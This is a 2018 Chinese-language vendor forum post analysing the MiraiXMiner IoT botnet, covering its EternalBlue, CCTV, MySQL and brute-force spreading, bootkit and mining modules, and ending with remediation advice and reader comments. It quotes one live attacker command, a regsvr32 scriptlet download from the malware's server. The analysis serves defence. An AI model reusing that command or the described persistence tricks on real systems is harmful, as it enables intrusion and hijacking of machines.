具备多病毒功能!MiraiXMiner物联网僵尸网络攻击来袭
  

SANGFOR_智安全 5511

{{ttag.title}}
本帖最后由 某公司_智安全 于 2018-12-5 10:38 编辑

近日,某公司安全团队跟踪到一新型的物联网僵尸网络,其融合了多种已知病毒家族的特点,包括Mirai物联网僵尸网络病毒、MyKings僵尸网络病毒、暗云木马、挖矿等,传播方式包括利用永恒之蓝漏洞、闭路电视物联网设备漏洞、MySQL漏洞等也包括RDP爆破和Telnet爆破等弱口令爆破。

282905c07364cd47c8.png


某公司已将其命名为MiraiXMiner,并且制定了完善的防御措施。现发布安全预警,提醒广大用户防范MiraiXMiner攻击。

病毒名称:MiraiXMiner
病毒性质:僵尸网络病毒、暗云木马、挖矿病毒等
影响范围:目前国内已有感染案例
危害等级:高危
传播方式:利用永恒之蓝漏洞、闭路电视物联网设备漏洞、MySQL漏洞等,也包括RDP爆破和Telnet爆破等弱口令爆破。

病毒分析
1、攻击流程
967155c07369851065.png
具体流程如下:
1. 病毒母体msinfo.exe通过注册服务&写入恶意代码到数据库的手段,实现持久化攻击。

2. 根据C&C命令从云端下载任意的攻击模块,此次的攻击模块为csrs.exe。

3. 添加恶意特权账户admin$。

4.从黑客服务器下载三个子模块:后门模块、DNS劫持模块、净化&下载挖矿模块。

5. 后门模块up.rar经过分析发现为有名的BootKit暗云木马。

6. u.exe通过篡改DNS配置文件达到劫持DNS的目的。

7. 净化模块upsnew2.exe的功能很多,除了杀死同行病毒,添加自启动项以外,还会停止Windows自动更新服务,以更稳定地控制受害主机。

8. 使用扫描工具和Mirai攻击库对内网设备进行大范围攻击。

9. 最后,母体msinfo.exe会连接云端,自动更新病毒,实时下载最新的攻击模块。

传播模块
最开始,通过ARP进行扫描操作确认MAC地址等信息:
322445c0736d13f975.png
扫描445端口,如下所示:
419935c0736e62a696.png
通过内置的masscan程序进行扫描,如下所示:
234065c0737025856b.png
对扫描到的目标,进行相应的攻击行为,如下所示:
748025c07371f9f9c0.png
1、执行永恒之蓝攻击行为CrackerMS17-010:
256275c073739d7078.png
2、攻击CCTV物联网设备漏洞CrackerCCTV:
913395c073753c281e.png
3、攻击MYSQL漏洞CrackerMYSQL:
330625c07376a54809.png
然后执行下面的数据库Payload命令过程,如下所示:
395765c07378968fda.png
将如下恶意代码写入数据库存储过程中,如下所示:
493705c0737a6bbe6a.png

恶意代码分别为
对RDP进行攻击CrackerRDP:
312295c07391ce56cd.png
对Telnet进行攻击CrackerTelnet:
116685c073910bd929.png

创建admin$账号
从服务器上下载相应的配置文件,然后解密,如下所示:
749535c0738f81f2ad.png
然后解密出相应的XML文件,进行下载执行恶意程序操作:
772385c0738d02bfeb.png
下载回来的CSRS是一个python脚本编写后生成的EXE,主要是一个Exploit,用于通过MS17-010漏洞,添加帐号:
341455c0738c359048.png
添加之后的主机,如下图所示:
583745c0738b9b201d.png
执行MS17-010漏洞攻击:
483115c0738abe04e6.png
其中,攻击的参数如下所示:
246265c07389a869c4.png
挖矿与暗云木马
下载恶意程序,通过start regsvr32 /s /u /n /i:http://up.ms1128.site:8888\\s1.txt scrobj.dll,如下所示:
487765c0738825b329.png

解密出上面的XML脚本:
428405c07385e6921e.png
Upsnew2释放暗云木马item.dat以及c3.bat脚本。
其中c3.bat脚本功能分别为:
1、清除其他病毒。
915355c073849bbccc.png
2、开启MSSQLSERVER。
445355c073835bfca1.png
3、在注册表以及任务计划中添加自启动。
883775c07381f08d01.png
870925c073827547d2.png
4、关闭自动更新。
908835c073814bed38.png
5、加载暗云木马。
194135c07380ad4df5.png
6、配置防火墙策略,关闭135、137、138、139、445端口,防止再被其它病毒感染。
630445c073804863bb.png
解决方案
1、隔离感染主机:已中毒计算机尽快隔离,关闭所有网络连接,禁用网卡。
2、切断传播途径:关闭潜在终端的SMB 445等网络共享端口,关闭异常的外联访问。某公司下一代防火墙用户,可开启IPS和僵尸网络功能(需升级到20181204版本),进行封堵。
3、查找攻击源:借助某公司安全感知平台检测内网攻击源。
4、查杀病毒:推荐使用某公司终端安全检测响应平台EDR进行查杀,病毒库需升级到20181204版本。
5、修补漏洞:打上永恒之蓝MS17-010等漏洞相关补丁。

打赏鼓励作者,期待更多好文!

打赏
1人已打赏

晴雨 发表于 2018-12-6 10:18
  
感谢分享,很受用,会继续分享给更多的人的。
adds 发表于 2018-12-26 15:11
  
确实很有用,要好好学习安全知识,不要被别人当肉鸡。
帅帅哥 发表于 2019-1-16 08:24
  
感谢分享
kevinking 发表于 2019-2-14 10:33
  
非常不错的帖子,内容专业,值得推荐
发表新帖
热门标签
全部标签>
每日一问
技术盲盒
技术笔记
每周精选
干货满满
技术咨询
信服课堂视频
秒懂零信任
自助服务平台操作指引
新版本体验
标准化排查
产品连连看
安装部署配置
功能体验
GIF动图学习
玩转零信任
2023技术争霸赛专题
技术晨报
安全攻防
每日一记
深信服技术支持平台
天逸直播
华北区交付直播
社区帮助指南
畅聊IT
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
上网策略
测试报告
日志审计
问题分析处理
流量管理
运维工具
云计算知识
用户认证
原创分享
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
SDP百科
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
排障笔记本
产品预警公告
信服圈儿
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
答题榜单公布
纪元平台
通用技术
卧龙计划
华北区拉练
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV

本版达人

SANGFOR...

本周分享达人